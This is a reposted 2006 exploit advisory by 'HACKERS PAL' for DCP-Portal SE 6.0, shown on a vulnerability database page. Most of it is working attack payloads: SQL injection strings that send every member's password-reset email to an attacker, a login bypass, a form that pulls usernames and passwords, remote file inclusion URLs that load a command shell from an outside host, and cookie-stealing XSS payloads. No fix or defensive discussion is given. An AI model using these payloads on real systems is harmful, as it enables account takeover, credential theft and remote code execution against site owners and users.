Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14279
HistorySep 14, 2006 - 12:00 a.m.

DCP-Portal SE 6.0 multiple injections

2006-09-1400:00:00
vulners.com
91
JSON

Hello,

DCP-Portal SE 6.0 multiple injections

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

sql injections
if magic_qoutes_gpc = off
/*************************************/

lostpassword.php

you can recive the reset password email on your email for any user you want :)
change [email protected] to your real email
example :
-1' union select uid ,sex,name,surname,'[email protected]',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members/*

and you will recive email reset password for all the members in this website

and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid

-1' union select uid ,sex,name,surname,'[email protected]',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members where uid=1/*

login
try the user name as
' or uid=1/*

or change the uid value for any username you want log with

file calendar.php
Sql injection by post method , try this form :)

<form name="hack" action="calendar.php" method=post>
<input type=hidden name='year' value="-1' union select uid,username,password,null,null from dcp5_members where uid='1">
<input type=submit>
</form>

file search.php

try one of these , bcause the number of columns changes from section to another :)
if you searched for (content,news,link,forum)
use
xx%') union select uid,username,password from dcp5_members/*

if you searched for (doc,anns)
use
xx%') union select uid,username,password,password from dcp5_members/*
/*************************************/

Remote File including
library/lib.php?root=http://www.soqor.net/tools/cmd.txt?
library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?

/*************************************/

Fill path
library/editor/editor.php
library/lib.php

/*************************************/

Xss
admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</script><"
admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</script>

admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</script><"
admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</script>
admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</script>
admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</script>

/*************************************/
WwW.SoQoR.NeT

JSON